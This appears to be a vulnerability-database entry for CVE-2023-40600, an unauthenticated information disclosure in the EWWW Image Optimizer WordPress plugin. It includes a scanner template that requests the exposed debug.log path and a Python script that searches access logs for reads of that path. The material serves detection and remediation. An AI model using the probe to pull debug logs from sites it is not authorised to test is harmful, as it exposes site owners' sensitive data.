EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure

CVE-2023-40600
Verified

Description

The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debug_log function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled.

Severity

Medium

Published Date

February 16, 2026

Template Author

Shivam Kamboj

CVE-2023-40600.yaml
id: CVE-2023-40600

info:
  name: EWWW Image Optimizer <= 7.2.0 - Unauthenticated Information Disclosure
  author: Shivam Kamboj
  severity: medium
  description: |
    The EWWW Image Optimizer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.2.0 via the debug_log function. This makes it possible for unauthenticated attackers to extract sensitive debug data when debug logging is enabled.
  impact:
    Attackers can access sensitive embedded data, potentially leading to information disclosure and further exploitation.
  remediation:
    Remove debug information and update to the latest version of EWWW Image Optimizer.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40600
    - https://patchstack.com/database/wordpress/plugin/ewww-image-optimizer/vulnerability/wordpress-ewww-image-optimizer-plugin-7-2-0-sensitive-data-exposure-vulnerability
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer/ewww-image-optimizer-720-unauthenticated-sensitive-information-exposure-via-debug-log
  metadata:
    verified: true
    max-request: 1
  tags: cve,cve2023,wp,wordpress,wp-plugin,ewww-image-optimizer,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/ewww/debug.log"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "ewww_image_optimizer","__construct()")'
        condition: and
# digest: 4a0a00473045022100f081fe88954782b22420244733720ec76bcc72f13270afb18b397dee6a651107022044105d9849b1cc36e727f665e911f62b0cb62e96c74e400c24eee8518e28f89e:922c64590222798bb761d5b6d8e72950

5.0 Severity

References

https://nvd.nist.gov/vuln/detail/CVE-2023-40600
https://patchstack.com/database/wordpress/plugin/ewww-image-optimizer/vulnerability/wordpress-ewww-image-optimizer-plugin-7-2-0-sensitive-data-exposure-vulnerability
https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer/ewww-image-optimizer-720-unauthenticated-sensitive-information-exposure-via-debug-log

Remediation Steps

Remove debug information and update to the latest version of EWWW Image Optimizer.
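
Before removing the log, it is worth checking whether it has already been fetched. The following is an added example, not part of the template or the plugin: it scans web server access-log lines for successful requests to the path the template probes. The function names, the `prefix` parameter, the assumption of common/combined log format, and the sample lines are all constructed for illustration.

```python
import re
from posixpath import normpath
from urllib.parse import unquote

# Path requested by the template on this page.
TARGET = "/wp-content/ewww/debug.log"

# Common/combined log format: host ident user [time] "request" status bytes
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)


def normalize(target):
    """Reduce a request target to a comparable path (hypothetical helper)."""
    path = unquote(target.split("?", 1)[0].split("#", 1)[0])
    # Collapse duplicate slashes and dot segments: //a/./b -> /a/b
    return normpath("/" + path.lstrip("/"))


def find_debug_log_reads(lines, prefix=""):
    """Return (host, time, status, size) for served requests to the debug log.

    prefix: subdirectory WordPress is installed under, if any (assumption).
    """
    wanted = normalize(prefix + TARGET)
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or normalize(m["target"]) != wanted:
            continue
        status = int(m["status"])
        if status in (200, 206):  # log content actually left the server
            size = 0 if m["size"] == "-" else int(m["size"])
            hits.append((m["host"], m["time"], status, size))
    return hits


# Constructed sample lines (documentation addresses), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [16/Feb/2026:10:00:01 +0000] "GET /wp-content/ewww/debug.log HTTP/1.1" 200 48211 "-" "-"',
    '192.0.2.11 - - [16/Feb/2026:10:00:05 +0000] "GET /wp-content//ewww/debug.log?x=1 HTTP/1.1" 200 48211 "-" "-"',
    '192.0.2.12 - - [16/Feb/2026:10:00:09 +0000] "GET /wp-content/ewww/debug%2Elog HTTP/1.1" 200 48211 "-" "-"',
    '198.51.100.7 - - [16/Feb/2026:10:01:00 +0000] "GET /wp-content/ewww/debug.log HTTP/1.1" 404 153 "-" "-"',
    '198.51.100.8 - - [16/Feb/2026:10:02:00 +0000] "GET /wp-content/uploads/a.png HTTP/1.1" 200 1024 "-" "-"',
]
```

Any hit means the log contents were served to that client, so whatever the log contained at that time should be treated as disclosed.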